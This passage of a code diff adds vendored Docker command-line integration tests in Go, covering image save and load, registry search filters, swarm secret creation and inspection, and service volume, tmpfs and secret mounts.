+	layerEntriesAUFS := []string{"./", ".wh..wh.aufs", ".wh..wh.orph/", ".wh..wh.plnk/", "opt/", "opt/a/", "opt/a/b/", "opt/a/b/c"}
+
+	name := "save-directory-permissions"
+	tmpDir, err := ioutil.TempDir("", "save-layers-with-directories")
+	c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary directory: %s", err))
+	extractionDirectory := filepath.Join(tmpDir, "image-extraction-dir")
+	os.Mkdir(extractionDirectory, 0777)
+
+	defer os.RemoveAll(tmpDir)
+	_, err = buildImage(name,
+		`FROM busybox
+	RUN adduser -D user && mkdir -p /opt/a/b && chown -R user:user /opt/a
+	RUN touch /opt/a/b/c && chown user:user /opt/a/b/c`,
+		true)
+	c.Assert(err, checker.IsNil, check.Commentf("%v", err))
+
+	out, _, err := runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "save", name),
+		exec.Command("tar", "-xf", "-", "-C", extractionDirectory),
+	)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to save and extract image: %s", out))
+
+	dirs, err := ioutil.ReadDir(extractionDirectory)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to get a listing of the layer directories: %s", err))
+
+	found := false
+	for _, entry := range dirs {
+		var entriesSansDev []string
+		if entry.IsDir() {
+			layerPath := filepath.Join(extractionDirectory, entry.Name(), "layer.tar")
+
+			f, err := os.Open(layerPath)
+			c.Assert(err, checker.IsNil, check.Commentf("failed to open %s: %s", layerPath, err))
+			defer f.Close()
+
+			entries, err := listTar(f)
+			for _, e := range entries {
+				if !strings.Contains(e, "dev/") {
+					entriesSansDev = append(entriesSansDev, e)
+				}
+			}
+			c.Assert(err, checker.IsNil, check.Commentf("encountered error while listing tar entries: %s", err))
+
+			if reflect.DeepEqual(entriesSansDev, layerEntries) || reflect.DeepEqual(entriesSansDev, layerEntriesAUFS) {
+				found = true
+				break
+			}
+		}
+	}
+
+	c.Assert(found, checker.Equals, true, check.Commentf("failed to find the layer with the right content listing"))
+
+}
+
+// Test loading a weird image where one of the layers is of zero size.
+// The layer.tar file is actually zero bytes, no padding or anything else.
+// See issue: 18170
+func (s *DockerSuite) TestLoadZeroSizeLayer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	dockerCmd(c, "load", "-i", "fixtures/load/emptyLayer.tar")
+}
+
+func (s *DockerSuite) TestSaveLoadParents(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	makeImage := func(from string, addfile string) string {
+		var (
+			out string
+		)
+		out, _ = dockerCmd(c, "run", "-d", from, "touch", addfile)
+		cleanedContainerID := strings.TrimSpace(out)
+
+		out, _ = dockerCmd(c, "commit", cleanedContainerID)
+		imageID := strings.TrimSpace(out)
+
+		dockerCmd(c, "rm", "-f", cleanedContainerID)
+		return imageID
+	}
+
+	idFoo := makeImage("busybox", "foo")
+	idBar := makeImage(idFoo, "bar")
+
+	tmpDir, err := ioutil.TempDir("", "save-load-parents")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(tmpDir)
+
+	c.Log("tmpdir", tmpDir)
+
+	outfile := filepath.Join(tmpDir, "out.tar")
+
+	dockerCmd(c, "save", "-o", outfile, idBar, idFoo)
+	dockerCmd(c, "rmi", idBar)
+	dockerCmd(c, "load", "-i", outfile)
+
+	inspectOut := inspectField(c, idBar, "Parent")
+	c.Assert(inspectOut, checker.Equals, idFoo)
+
+	inspectOut = inspectField(c, idFoo, "Parent")
+	c.Assert(inspectOut, checker.Equals, "")
+}
+
+func (s *DockerSuite) TestSaveLoadNoTag(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	name := "saveloadnotag"
+
+	_, err := buildImage(name, "FROM busybox\nENV foo=bar", true)
+	c.Assert(err, checker.IsNil, check.Commentf("%v", err))
+
+	id := inspectField(c, name, "Id")
+
+	// Test to make sure that save w/o name just shows imageID during load
+	out, _, err := runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "save", id),
+		exec.Command(dockerBinary, "load"))
+	c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err))
+
+	// Should not show 'name' but should show the image ID during the load
+	c.Assert(out, checker.Not(checker.Contains), "Loaded image: ")
+	c.Assert(out, checker.Contains, "Loaded image ID:")
+	c.Assert(out, checker.Contains, id)
+
+	// Test to make sure that save by name shows that name during load
+	out, _, err = runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "save", name),
+		exec.Command(dockerBinary, "load"))
+	c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err))
+	c.Assert(out, checker.Contains, "Loaded image: "+name+":latest")
+	c.Assert(out, checker.Not(checker.Contains), "Loaded image ID:")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go
new file mode 100644
index 0000000000..22445e5bbe
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go
@@ -0,0 +1,109 @@
+// +build !windows
+
+package main
+
+import (
+	"context"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+	"github.com/kr/pty"
+)
+
+// save a repo and try to load it using stdout
+func (s *DockerSuite) TestSaveAndLoadRepoStdout(c *check.C) {
+	name := "test-save-and-load-repo-stdout"
+	dockerCmd(c, "run", "--name", name, "busybox", "true")
+
+	repoName := "foobar-save-load-test"
+	before, _ := dockerCmd(c, "commit", name, repoName)
+	before = strings.TrimRight(before, "\n")
+
+	tmpFile, err := ioutil.TempFile("", "foobar-save-load-test.tar")
+	c.Assert(err, check.IsNil)
+	defer os.Remove(tmpFile.Name())
+
+	saveCmd := exec.Command(dockerBinary, "save", repoName)
+	saveCmd.Stdout = tmpFile
+
+	_, err = runCommand(saveCmd)
+	c.Assert(err, check.IsNil)
+
+	tmpFile, err = os.Open(tmpFile.Name())
+	c.Assert(err, check.IsNil)
+	defer tmpFile.Close()
+
+	deleteImages(repoName)
+
+	loadCmd := exec.Command(dockerBinary, "load")
+	loadCmd.Stdin = tmpFile
+
+	out, _, err := runCommandWithOutput(loadCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	after := inspectField(c, repoName, "Id")
+	after = strings.TrimRight(after, "\n")
+
+	c.Assert(after, check.Equals, before) //inspect is not the same after a save / load
+
+	deleteImages(repoName)
+
+	pty, tty, err := pty.Open()
+	c.Assert(err, check.IsNil)
+	cmd := exec.Command(dockerBinary, "save", repoName)
+	cmd.Stdin = tty
+	cmd.Stdout = tty
+	cmd.Stderr = tty
+	c.Assert(cmd.Start(), check.IsNil)
+	c.Assert(cmd.Wait(), check.NotNil) //did not break writing to a TTY
+
+	buf := make([]byte, 1024)
+
+	n, err := pty.Read(buf)
+	c.Assert(err, check.IsNil) //could not read tty output
+	c.Assert(string(buf[:n]), checker.Contains, "Cowardly refusing", check.Commentf("help output is not being yielded", out))
+}
+
+func (s *DockerSuite) TestSaveAndLoadWithProgressBar(c *check.C) {
+	name := "test-load"
+	_, err := buildImage(name, `
+	FROM busybox
+	RUN touch aa
+	`, true)
+	c.Assert(err, check.IsNil)
+
+	tmptar := name + ".tar"
+	dockerCmd(c, "save", "-o", tmptar, name)
+	defer os.Remove(tmptar)
+
+	dockerCmd(c, "rmi", name)
+	dockerCmd(c, "tag", "busybox", name)
+	out, _ := dockerCmd(c, "load", "-i", tmptar)
+	expected := fmt.Sprintf("The image %s:latest already exists, renaming the old one with ID", name)
+	c.Assert(out, checker.Contains, expected)
+}
+
+// fail because load didn't receive data from stdin
+func (s *DockerSuite) TestLoadNoStdinFail(c *check.C) {
+	pty, tty, err := pty.Open()
+	c.Assert(err, check.IsNil)
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+	cmd := exec.CommandContext(ctx, dockerBinary, "load")
+	cmd.Stdin = tty
+	cmd.Stdout = tty
+	cmd.Stderr = tty
+	c.Assert(cmd.Run(), check.NotNil) // docker-load should fail
+
+	buf := make([]byte, 1024)
+
+	n, err := pty.Read(buf)
+	c.Assert(err, check.IsNil) //could not read tty output
+	c.Assert(string(buf[:n]), checker.Contains, "requested load from stdin, but stdin is empty")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go
new file mode 100644
index 0000000000..5a32f2ab93
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go
@@ -0,0 +1,131 @@
+package main
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// search for repos named  "registry" on the central registry
+func (s *DockerSuite) TestSearchOnCentralRegistry(c *check.C) {
+	testRequires(c, Network, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "search", "busybox")
+	c.Assert(out, checker.Contains, "Busybox base image.", check.Commentf("couldn't find any repository named (or containing) 'Busybox base image.'"))
+}
+
+func (s *DockerSuite) TestSearchStarsOptionWithWrongParameter(c *check.C) {
+	out, _, err := dockerCmdWithError("search", "--filter", "stars=a", "busybox")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Invalid filter", check.Commentf("couldn't find the invalid filter warning"))
+
+	out, _, err = dockerCmdWithError("search", "-f", "stars=a", "busybox")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Invalid filter", check.Commentf("couldn't find the invalid filter warning"))
+
+	out, _, err = dockerCmdWithError("search", "-f", "is-automated=a", "busybox")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Invalid filter", check.Commentf("couldn't find the invalid filter warning"))
+
+	out, _, err = dockerCmdWithError("search", "-f", "is-official=a", "busybox")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Invalid filter", check.Commentf("couldn't find the invalid filter warning"))
+
+	// -s --stars deprecated since Docker 1.13
+	out, _, err = dockerCmdWithError("search", "--stars=a", "busybox")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "invalid syntax", check.Commentf("couldn't find the invalid value warning"))
+
+	// -s --stars deprecated since Docker 1.13
+	out, _, err = dockerCmdWithError("search", "-s=-1", "busybox")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "invalid syntax", check.Commentf("couldn't find the invalid value warning"))
+}
+
+func (s *DockerSuite) TestSearchCmdOptions(c *check.C) {
+	testRequires(c, Network, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "search", "--help")
+	c.Assert(out, checker.Contains, "Usage:\tdocker search [OPTIONS] TERM")
+
+	outSearchCmd, _ := dockerCmd(c, "search", "busybox")
+	outSearchCmdNotrunc, _ := dockerCmd(c, "search", "--no-trunc=true", "busybox")
+
+	c.Assert(len(outSearchCmd) > len(outSearchCmdNotrunc), check.Equals, false, check.Commentf("The no-trunc option can't take effect."))
+
+	outSearchCmdautomated, _ := dockerCmd(c, "search", "--filter", "is-automated=true", "busybox") //The busybox is a busybox base image, not an AUTOMATED image.
+	outSearchCmdautomatedSlice := strings.Split(outSearchCmdautomated, "\n")
+	for i := range outSearchCmdautomatedSlice {
+		c.Assert(strings.HasPrefix(outSearchCmdautomatedSlice[i], "busybox "), check.Equals, false, check.Commentf("The busybox is not an AUTOMATED image: %s", outSearchCmdautomated))
+	}
+
+	outSearchCmdNotOfficial, _ := dockerCmd(c, "search", "--filter", "is-official=false", "busybox") //The busybox is a busybox base image, official image.
+	outSearchCmdNotOfficialSlice := strings.Split(outSearchCmdNotOfficial, "\n")
+	for i := range outSearchCmdNotOfficialSlice {
+		c.Assert(strings.HasPrefix(outSearchCmdNotOfficialSlice[i], "busybox "), check.Equals, false, check.Commentf("The busybox is not an OFFICIAL image: %s", outSearchCmdNotOfficial))
+	}
+
+	outSearchCmdOfficial, _ := dockerCmd(c, "search", "--filter", "is-official=true", "busybox") //The busybox is a busybox base image, official image.
+	outSearchCmdOfficialSlice := strings.Split(outSearchCmdOfficial, "\n")
+	c.Assert(outSearchCmdOfficialSlice, checker.HasLen, 3) // 1 header, 1 line, 1 carriage return
+	c.Assert(strings.HasPrefix(outSearchCmdOfficialSlice[1], "busybox "), check.Equals, true, check.Commentf("The busybox is an OFFICIAL image: %s", outSearchCmdNotOfficial))
+
+	outSearchCmdStars, _ := dockerCmd(c, "search", "--filter", "stars=2", "busybox")
+	c.Assert(strings.Count(outSearchCmdStars, "[OK]") > strings.Count(outSearchCmd, "[OK]"), check.Equals, false, check.Commentf("The quantity of images with stars should be less than that of all images: %s", outSearchCmdStars))
+
+	dockerCmd(c, "search", "--filter", "is-automated=true", "--filter", "stars=2", "--no-trunc=true", "busybox")
+
+	// --automated deprecated since Docker 1.13
+	outSearchCmdautomated1, _ := dockerCmd(c, "search", "--automated=true", "busybox") //The busybox is a busybox base image, not an AUTOMATED image.
+	outSearchCmdautomatedSlice1 := strings.Split(outSearchCmdautomated1, "\n")
+	for i := range outSearchCmdautomatedSlice1 {
+		c.Assert(strings.HasPrefix(outSearchCmdautomatedSlice1[i], "busybox "), check.Equals, false, check.Commentf("The busybox is not an AUTOMATED image: %s", outSearchCmdautomated))
+	}
+
+	// -s --stars deprecated since Docker 1.13
+	outSearchCmdStars1, _ := dockerCmd(c, "search", "--stars=2", "busybox")
+	c.Assert(strings.Count(outSearchCmdStars1, "[OK]") > strings.Count(outSearchCmd, "[OK]"), check.Equals, false, check.Commentf("The quantity of images with stars should be less than that of all images: %s", outSearchCmdStars1))
+
+	// -s --stars deprecated since Docker 1.13
+	dockerCmd(c, "search", "--stars=2", "--automated=true", "--no-trunc=true", "busybox")
+}
+
+// search for repos which start with "ubuntu-" on the central registry
+func (s *DockerSuite) TestSearchOnCentralRegistryWithDash(c *check.C) {
+	testRequires(c, Network, DaemonIsLinux)
+
+	dockerCmd(c, "search", "ubuntu-")
+}
+
+// test case for #23055
+func (s *DockerSuite) TestSearchWithLimit(c *check.C) {
+	testRequires(c, Network, DaemonIsLinux)
+
+	limit := 10
+	out, _, err := dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker")
+	c.Assert(err, checker.IsNil)
+	outSlice := strings.Split(out, "\n")
+	c.Assert(outSlice, checker.HasLen, limit+2) // 1 header, 1 carriage return
+
+	limit = 50
+	out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker")
+	c.Assert(err, checker.IsNil)
+	outSlice = strings.Split(out, "\n")
+	c.Assert(outSlice, checker.HasLen, limit+2) // 1 header, 1 carriage return
+
+	limit = 100
+	out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker")
+	c.Assert(err, checker.IsNil)
+	outSlice = strings.Split(out, "\n")
+	c.Assert(outSlice, checker.HasLen, limit+2) // 1 header, 1 carriage return
+
+	limit = 0
+	out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker")
+	c.Assert(err, checker.Not(checker.IsNil))
+
+	limit = 200
+	out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker")
+	c.Assert(err, checker.Not(checker.IsNil))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go
new file mode 100644
index 0000000000..b79fdbeb59
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go
@@ -0,0 +1,131 @@
+// +build !windows
+
+package main
+
+import (
+	"io/ioutil"
+	"os"
+	"strings"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSwarmSuite) TestSecretCreate(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testName := "test_secret"
+	id := d.createSecret(c, swarm.SecretSpec{
+		swarm.Annotations{
+			Name: testName,
+		},
+		[]byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+
+	secret := d.getSecret(c, id)
+	c.Assert(secret.Spec.Name, checker.Equals, testName)
+}
+
+func (s *DockerSwarmSuite) TestSecretCreateWithLabels(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testName := "test_secret"
+	id := d.createSecret(c, swarm.SecretSpec{
+		swarm.Annotations{
+			Name: testName,
+			Labels: map[string]string{
+				"key1": "value1",
+				"key2": "value2",
+			},
+		},
+		[]byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+
+	secret := d.getSecret(c, id)
+	c.Assert(secret.Spec.Name, checker.Equals, testName)
+	c.Assert(len(secret.Spec.Labels), checker.Equals, 2)
+	c.Assert(secret.Spec.Labels["key1"], checker.Equals, "value1")
+	c.Assert(secret.Spec.Labels["key2"], checker.Equals, "value2")
+}
+
+// Test case for 28884
+func (s *DockerSwarmSuite) TestSecretCreateResolve(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "foo"
+	id := d.createSecret(c, swarm.SecretSpec{
+		swarm.Annotations{
+			Name: name,
+		},
+		[]byte("foo"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+
+	fake := d.createSecret(c, swarm.SecretSpec{
+		swarm.Annotations{
+			Name: id,
+		},
+		[]byte("fake foo"),
+	})
+	c.Assert(fake, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", fake))
+
+	out, err := d.Cmd("secret", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name)
+	c.Assert(out, checker.Contains, fake)
+
+	out, err = d.Cmd("secret", "rm", id)
+	c.Assert(out, checker.Contains, id)
+
+	// Fake one will remain
+	out, err = d.Cmd("secret", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), name)
+	c.Assert(out, checker.Contains, fake)
+
+	// Remove based on name prefix of the fake one
+	// (which is the same as the ID of foo one) should not work
+	// as search is only done based on:
+	// - Full ID
+	// - Full Name
+	// - Partial ID (prefix)
+	out, err = d.Cmd("secret", "rm", id[:5])
+	c.Assert(out, checker.Not(checker.Contains), id)
+	out, err = d.Cmd("secret", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), name)
+	c.Assert(out, checker.Contains, fake)
+
+	// Remove based on ID prefix of the fake one should succeed
+	out, err = d.Cmd("secret", "rm", fake[:5])
+	c.Assert(out, checker.Contains, fake)
+	out, err = d.Cmd("secret", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), name)
+	c.Assert(out, checker.Not(checker.Contains), id)
+	c.Assert(out, checker.Not(checker.Contains), fake)
+}
+
+func (s *DockerSwarmSuite) TestSecretCreateWithFile(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testFile, err := ioutil.TempFile("", "secretCreateTest")
+	c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file"))
+	defer os.Remove(testFile.Name())
+
+	testData := "TESTINGDATA"
+	_, err = testFile.Write([]byte(testData))
+	c.Assert(err, checker.IsNil, check.Commentf("failed to write to temporary file"))
+
+	testName := "test_secret"
+	out, err := d.Cmd("secret", "create", testName, testFile.Name())
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "", check.Commentf(out))
+
+	id := strings.TrimSpace(out)
+	secret := d.getSecret(c, id)
+	c.Assert(secret.Spec.Name, checker.Equals, testName)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go
new file mode 100644
index 0000000000..0985a2bd59
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go
@@ -0,0 +1,68 @@
+// +build !windows
+
+package main
+
+import (
+	"encoding/json"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSwarmSuite) TestSecretInspect(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testName := "test_secret"
+	id := d.createSecret(c, swarm.SecretSpec{
+		swarm.Annotations{
+			Name: testName,
+		},
+		[]byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+
+	secret := d.getSecret(c, id)
+	c.Assert(secret.Spec.Name, checker.Equals, testName)
+
+	out, err := d.Cmd("secret", "inspect", testName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	var secrets []swarm.Secret
+	c.Assert(json.Unmarshal([]byte(out), &secrets), checker.IsNil)
+	c.Assert(secrets, checker.HasLen, 1)
+}
+
+func (s *DockerSwarmSuite) TestSecretInspectMultiple(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testNames := []string{
+		"test0",
+		"test1",
+	}
+	for _, n := range testNames {
+		id := d.createSecret(c, swarm.SecretSpec{
+			swarm.Annotations{
+				Name: n,
+			},
+			[]byte("TESTINGDATA"),
+		})
+		c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+
+		secret := d.getSecret(c, id)
+		c.Assert(secret.Spec.Name, checker.Equals, n)
+
+	}
+
+	args := []string{
+		"secret",
+		"inspect",
+	}
+	args = append(args, testNames...)
+	out, err := d.Cmd(args...)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	var secrets []swarm.Secret
+	c.Assert(json.Unmarshal([]byte(out), &secrets), checker.IsNil)
+	c.Assert(secrets, checker.HasLen, 2)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go
new file mode 100644
index 0000000000..9e8b1e9956
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go
@@ -0,0 +1,175 @@
+// +build !windows
+
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSwarmSuite) TestServiceCreateMountVolume(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+	out, err := d.Cmd("service", "create", "--mount", "type=volume,source=foo,target=/foo,volume-nocopy", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	id := strings.TrimSpace(out)
+
+	var tasks []swarm.Task
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks = d.getServiceTasks(c, id)
+		return len(tasks) > 0, nil
+	}, checker.Equals, true)
+
+	task := tasks[0]
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		if task.NodeID == "" || task.Status.ContainerStatus.ContainerID == "" {
+			task = d.getTask(c, task.ID)
+		}
+		return task.NodeID != "" && task.Status.ContainerStatus.ContainerID != "", nil
+	}, checker.Equals, true)
+
+	// check container mount config
+	out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .HostConfig.Mounts}}", task.Status.ContainerStatus.ContainerID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	var mountConfig []mount.Mount
+	c.Assert(json.Unmarshal([]byte(out), &mountConfig), checker.IsNil)
+	c.Assert(mountConfig, checker.HasLen, 1)
+
+	c.Assert(mountConfig[0].Source, checker.Equals, "foo")
+	c.Assert(mountConfig[0].Target, checker.Equals, "/foo")
+	c.Assert(mountConfig[0].Type, checker.Equals, mount.TypeVolume)
+	c.Assert(mountConfig[0].VolumeOptions, checker.NotNil)
+	c.Assert(mountConfig[0].VolumeOptions.NoCopy, checker.True)
+
+	// check container mounts actual
+	out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .Mounts}}", task.Status.ContainerStatus.ContainerID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	var mounts []types.MountPoint
+	c.Assert(json.Unmarshal([]byte(out), &mounts), checker.IsNil)
+	c.Assert(mounts, checker.HasLen, 1)
+
+	c.Assert(mounts[0].Type, checker.Equals, mount.TypeVolume)
+	c.Assert(mounts[0].Name, checker.Equals, "foo")
+	c.Assert(mounts[0].Destination, checker.Equals, "/foo")
+	c.Assert(mounts[0].RW, checker.Equals, true)
+}
+
+func (s *DockerSwarmSuite) TestServiceCreateWithSecretSimple(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	serviceName := "test-service-secret"
+	testName := "test_secret"
+	id := d.createSecret(c, swarm.SecretSpec{
+		swarm.Annotations{
+			Name: testName,
+		},
+		[]byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+
+	out, err := d.Cmd("service", "create", "--name", serviceName, "--secret", testName, "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	var refs []swarm.SecretReference
+	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
+	c.Assert(refs, checker.HasLen, 1)
+
+	c.Assert(refs[0].SecretName, checker.Equals, testName)
+	c.Assert(refs[0].File, checker.Not(checker.IsNil))
+	c.Assert(refs[0].File.Name, checker.Equals, testName)
+	c.Assert(refs[0].File.UID, checker.Equals, "0")
+	c.Assert(refs[0].File.GID, checker.Equals, "0")
+}
+
+func (s *DockerSwarmSuite) TestServiceCreateWithSecretSourceTarget(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	serviceName := "test-service-secret"
+	testName := "test_secret"
+	id := d.createSecret(c, swarm.SecretSpec{
+		swarm.Annotations{
+			Name: testName,
+		},
+		[]byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+	testTarget := "testing"
+
+	out, err := d.Cmd("service", "create", "--name", serviceName, "--secret", fmt.Sprintf("source=%s,target=%s", testName, testTarget), "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	var refs []swarm.SecretReference
+	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
+	c.Assert(refs, checker.HasLen, 1)
+
+	c.Assert(refs[0].SecretName, checker.Equals, testName)
+	c.Assert(refs[0].File, checker.Not(checker.IsNil))
+	c.Assert(refs[0].File.Name, checker.Equals, testTarget)
+}
+
+func (s *DockerSwarmSuite) TestServiceCreateMountTmpfs(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+	out, err := d.Cmd("service", "create", "--mount", "type=tmpfs,target=/foo,tmpfs-size=1MB", "busybox", "sh", "-c", "mount | grep foo; tail -f /dev/null")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	id := strings.TrimSpace(out)
+
+	var tasks []swarm.Task
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks = d.getServiceTasks(c, id)
+		return len(tasks) > 0, nil
+	}, checker.Equals, true)
+
+	task := tasks[0]
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		if task.NodeID == "" || task.Status.ContainerStatus.ContainerID == "" {
+			task = d.getTask(c, task.ID)
+		}
+		return task.NodeID != "" && task.Status.ContainerStatus.ContainerID != "", nil
+	}, checker.Equals, true)
+
+	// check container mount config
+	out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .HostConfig.Mounts}}", task.Status.ContainerStatus.ContainerID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	var mountConfig []mount.Mount
+	c.Assert(json.Unmarshal([]byte(out), &mountConfig), checker.IsNil)
+	c.Assert(mountConfig, checker.HasLen, 1)
+
+	c.Assert(mountConfig[0].Source, checker.Equals, "")
+	c.Assert(mountConfig[0].Target, checker.Equals, "/foo")
+	c.Assert(mountConfig[0].Type, checker.Equals, mount.TypeTmpfs)
+	c.Assert(mountConfig[0].TmpfsOptions, checker.NotNil)
+	c.Assert(mountConfig[0].TmpfsOptions.SizeBytes, checker.Equals, int64(1048576))
+
+	// check container mounts actual
+	out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .Mounts}}", task.Status.ContainerStatus.ContainerID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	var mounts []types.MountPoint
+	c.Assert(json.Unmarshal([]byte(out), &mounts), checker.IsNil)
+	c.Assert(mounts, checker.HasLen, 1)
+
+	c.Assert(mounts[0].Type, checker.Equals, mount.TypeTmpfs)
+	c.Assert(mounts[0].Name, checker.Equals, "")
+	c.Assert(mounts[0].Destination, checker.Equals, "/foo")
+	c.Assert(mounts[0].RW, checker.Equals, true)
+
+	out, err = s.nodeCmd(c, task.NodeID, "logs", task.Status.ContainerStatus.ContainerID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.HasPrefix, "tmpfs on /foo type tmpfs")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "size=1024k")
+}
